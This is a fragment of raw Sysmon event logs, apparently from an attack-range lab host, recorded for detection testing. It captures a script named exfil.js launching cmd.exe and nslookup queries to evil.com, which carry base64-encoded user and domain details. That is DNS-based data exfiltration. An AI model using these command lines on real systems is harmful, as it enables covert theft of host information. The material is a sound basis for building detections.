14:21:50.668{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000215415Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:50.668{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000215414Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:50.668{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000215413Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:50.668{2E1864BB-FA28-6299-3207-000000005F02}50324048C:\Windows\system32\csrss.exe{2E1864BB-18FE-629A-4546-000000005F02}172C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000215412Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:50.668{2E1864BB-18E0-629A-6742-000000005F02}39765100C:\Windows\System32\WScript.exe{2E1864BB-18FE-629A-4546-000000005F02}172C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\System32\windows.storage.dll+16e79b|C:\Windows\System32\windows.storage.dll+16e4b1|C:\Windows\System32\windows.storage.dll+16e0fe|C:\Windows\System32\windows.storage.dll+16f3a0|C:\Windows\System32\windows.storage.dll+16de4e|C:\Windows\System32\windows.storage.dll+fce4d|C:\Windows\System32\windows.storage.dll+fd58c|C:\Windows\System32\windows.storage.dll+fc8f0|C:\Windows\System32\SHELL32.dll+49d0f|C:\Windows\System32\SHELL32.dll+49b9c|C:\Windows\System32\SHELL32.dll+b2f5e|C:\Windows\System32\shcore.dll+33fbd|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000215411Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:50.682{2E1864BB-18FE-629A-4546-000000005F02}172C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.Exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A VXNlckRvbWFpbjogQVRUQUNLUkFOR0U= evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlrtq.tmp 2>&1C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{2E1864BB-18E0-629A-6742-000000005F02}3976C:\Windows\System32\wscript.exe"C:\Windows\System32\WScript.exe" "C:\Temp\exfil.js" 23542300x8000000000000000215410Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:50.668{2E1864BB-18E0-629A-6742-000000005F02}3976ATTACKRANGE\AdministratorC:\Windows\System32\WScript.exeC:\Users\ADMINI~1\AppData\Local\Temp\2\nlwws.tmpMD5=F6BF968BD6C55CB01B482E390B7AB413,SHA256=D3302028A36B5DF1F677CB3E99C1E635A1E68F78F1338041C9F2CB6A2C5F113B,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000215409Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:50.653{2E1864BB-18FE-629A-4346-000000005F02}61807832C:\Windows\system32\conhost.exe{2E1864BB-18FE-629A-4446-000000005F02}1848C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000215408Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:50.637{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000215407Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:50.637{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000215406Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:50.637{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000215405Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:50.637{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000215404Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:50.637{2E1864BB-FA28-6299-3207-000000005F02}50322100C:\Windows\system32\csrss.exe{2E1864BB-18FE-629A-4446-000000005F02}1848C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000215403Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:50.637{2E1864BB-18FE-629A-4246-000000005F02}79086416C:\Windows\system32\cmd.exe{2E1864BB-18FE-629A-4446-000000005F02}1848C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\cmd.exe+f1e1|C:\Windows\system32\cmd.exe+11a37|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+f916|C:\Windows\system32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000215402Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:50.649{2E1864BB-18FE-629A-4446-000000005F02}1848C:\Windows\System32\nslookup.exe10.0.14393.0 (rs1_release.160715-1616)nslookupMicrosoft® Windows® Operating SystemMicrosoft Corporationnslookup.exenslookup.exe -timeout=5 -retry=3 -type=A VXNlckNhcHRpb246IEFUVEFDS1JBTkdFXEd1ZXN0 evil.com C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=488698C899FE524430270C1D14FE99CF,SHA256=24553BFAB13871FAF3EE6F1F8EFECC5D25368A706A42CA35319228D3547418FA,IMPHASH=446F3F94B921C80C9E9497075AA3EF61{2E1864BB-18FE-629A-4246-000000005F02}7908C:\Windows\System32\cmd.exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A VXNlckNhcHRpb246IEFUVEFDS1JBTkdFXEd1ZXN0 evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlwws.tmp 2>&1 10341000x8000000000000000215401Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:50.621{2E1864BB-E13E-6299-1000-000000005F02}3641888C:\Windows\system32\svchost.exe{2E1864BB-18FE-629A-4346-000000005F02}6180C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000215400Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:50.621{2E1864BB-E13E-6299-1000-000000005F02}3641376C:\Windows\system32\svchost.exe{2E1864BB-18FE-629A-4346-000000005F02}6180C:\Windows\system32\conhost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000215399Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:50.621{2E1864BB-18FE-629A-4346-000000005F02}61807832C:\Windows\system32\conhost.exe{2E1864BB-18FE-629A-4246-000000005F02}7908C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000215398Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:50.606{2E1864BB-FA28-6299-3207-000000005F02}50322100C:\Windows\system32\csrss.exe{2E1864BB-18FE-629A-4346-000000005F02}6180C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cd4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000215397Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:50.606{2E1864BB-FA28-6299-3207-000000005F02}50322100C:\Windows\system32\csrss.exe{2E1864BB-18FE-629A-4246-000000005F02}7908C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000215396Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:50.606{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000215395Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:50.606{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000215394Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:50.606{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000215393Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:50.606{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000215392Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:50.605{2E1864BB-18E0-629A-6742-000000005F02}3976652C:\Windows\System32\WScript.exe{2E1864BB-18FE-629A-4246-000000005F02}7908C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\System32\windows.storage.dll+16e79b|C:\Windows\System32\windows.storage.dll+16e4b1|C:\Windows\System32\windows.storage.dll+16e0fe|C:\Windows\System32\windows.storage.dll+16f3a0|C:\Windows\System32\windows.storage.dll+16de4e|C:\Windows\System32\windows.storage.dll+fce4d|C:\Windows\System32\windows.storage.dll+fd58c|C:\Windows\System32\windows.storage.dll+fc8f0|C:\Windows\System32\SHELL32.dll+49d0f|C:\Windows\System32\SHELL32.dll+49b9c|C:\Windows\System32\SHELL32.dll+b2f5e|C:\Windows\System32\shcore.dll+33fbd|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000215391Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:50.605{2E1864BB-18FE-629A-4246-000000005F02}7908C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.Exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A VXNlckNhcHRpb246IEFUVEFDS1JBTkdFXEd1ZXN0 evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlwws.tmp 2>&1C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{2E1864BB-18E0-629A-6742-000000005F02}3976C:\Windows\System32\wscript.exe"C:\Windows\System32\WScript.exe" "C:\Temp\exfil.js" 23542300x8000000000000000215390Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:50.601{2E1864BB-18E0-629A-6742-000000005F02}3976ATTACKRANGE\AdministratorC:\Windows\System32\WScript.exeC:\Users\ADMINI~1\AppData\Local\Temp\2\nlrhgdyb.tmpMD5=24F4EB82345A0DA00DE01E116A71736E,SHA256=1239B48CF33DE00FBE8DCE68AC67A1D60A6D2C2E699D9B3665FAD4716A3235AA,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000215389Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:50.568{2E1864BB-18FE-629A-4046-000000005F02}74443336C:\Windows\system32\conhost.exe{2E1864BB-18FE-629A-4146-000000005F02}7780C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000215388Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:50.553{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000215387Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:50.553{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000215386Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:50.553{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+8